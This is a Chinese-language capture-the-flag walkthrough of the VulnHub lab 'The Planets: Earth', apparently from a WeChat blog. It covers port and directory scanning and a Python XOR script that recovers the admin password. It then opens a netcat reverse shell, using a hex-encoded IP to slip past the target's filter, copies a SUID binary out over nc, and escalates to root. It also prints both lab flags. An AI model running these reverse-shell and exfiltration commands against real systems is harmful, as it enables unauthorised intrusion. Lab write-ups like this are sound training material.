声明:请勿将文章内的相关技术用于非法目的,如有相关非法行为与文章作者和本公众号无关。请遵守《中华人民共和国网络安全法》。
0X01 前期准备
攻击IP:192.168.1.108靶机IP:192.168.1.109
0X02 信息收集
nmap -A -p 0-65535 192.168.1.109 //扫描端口
通过vim添加DNS
访问https://earth.local/发现三个字符串
37090b59030f11060b0a1b4e0000000000004312170a1b0b0e4107174f1a0b044e0a000202134e0a161d17040359061d43370f15030b10414e340e1c0a0f0b0b061d430e0059220f11124059261ae281ba124e14001c06411a110e00435542495f5e430a0715000306150b0b1c4e4b5242495f5e430c07150a1d4a410216010943e281b54e1c0101160606591b0143121a0b0a1a00094e1f1d010e412d180307050e1c17060f43150159210b144137161d054d41270d4f0710410010010b431507140a1d43001d5903010d064e18010a4307010c1d4e1708031c1c4e02124e1d0a0b13410f0a4f2b02131a11e281b61d43261c18010a43220f1716010d403714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b452402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5apython3 dirsearch.py -u https://earth.local/ 扫描目录python3 dirsearch.py -u https://terratest.earth.local/
发现存在 /testingnotes.*文件,爆破发现是个TXT文件访问https://terratest.earth.local/testingnotes.txtTesting secure messaging system notes:*Using XOR encryption as the algorithm, should be safe as used in RSA.*Earth has confirmed they have received our sent messages.*testdata.txt was used to test encryption.*terra used as username for admin portal.Todo:*How do we send our monthly keys to Earth securely? Or should we change keys weekly?*Need to test different key lengths to protect against bruteforce. How long should the key be?*Need to improve the interface of the messaging interface and the admin panel, it's currently very basic.信息发现一个testdata.txt文件,用户名为terra,密码需要通过testdata.txt文件和一个字符串XOR来获得,此时就想到了前面获得的三个字符简单写个代码获得一串字符串#!/usr/bin/python3import binasciia = b"According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago."b1 = "37090b59030f11060b0a1b4e0000000000004312170a1b0b0e4107174f1a0b044e0a000202134e0a161d17040359061d43370f15030b10414e340e1c0a0f0b0b061d430e0059220f11124059261ae281ba124e14001c06411a110e00435542495f5e430a0715000306150b0b1c4e4b5242495f5e430c07150a1d4a410216010943e281b54e1c0101160606591b0143121a0b0a1a00094e1f1d010e412d180307050e1c17060f43150159210b144137161d054d41270d4f0710410010010b431507140a1d43001d5903010d064e18010a4307010c1d4e1708031c1c4e02124e1d0a0b13410f0a4f2b02131a11e281b61d43261c18010a43220f1716010d40"b2 = "3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b45"b3 = "2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a"c = binascii.b2a_hex(a)d = hex(int(c,16) ^ int(b3,16))print((binascii.a2b_hex(d[2:])))运行结果:earthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimat发现通过earthclimatechangebad4humans一直在循环,尝试登录用户名:terra密码:earthclimatechangebad4humans
0X03 反弹shell
尝试反弹shell,经过测试发现需要将IP地址转换为16进制才能执行成功攻击机:nc -lvvp 9191靶机:nc -e /bin/sh 0xc0.0xa8.0x01.0x6c 9191
python -c 'import pty; pty.spawn("/bin/bash")' //启用python交互式find / -name "*flag*" //搜索flag文件
falg:[user_flag_3353b67d6437f07ba7d34afd7d2fc27d]0X04 提权
find / -perm -4000 -ls 2> /dev/null //特殊权限搜索发现一个特权文件,运行不成功将文件传出来进行分析攻击机:nc -nlvp 9191 > /tmp/reset_root靶机:nc 192.168.1.108 9191 < /usr/bin/reset_root
使用strace命令分析,发现缺失文件创建尝试运行
touch /dev/shm/kHgTFI5Gtouch /dev/shm/Zw7bV9U5touch /tmp/kcM0Wewe运行成功,提示重置密码为Earth
获取flag
flag:[root_flag_b0da9554d29db2117b02aa8b66ec492e]0X05
原文始发于微信公众号(皓月的笔记本):【靶场合集】vulnhub-THE PLANETS: EARTH
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论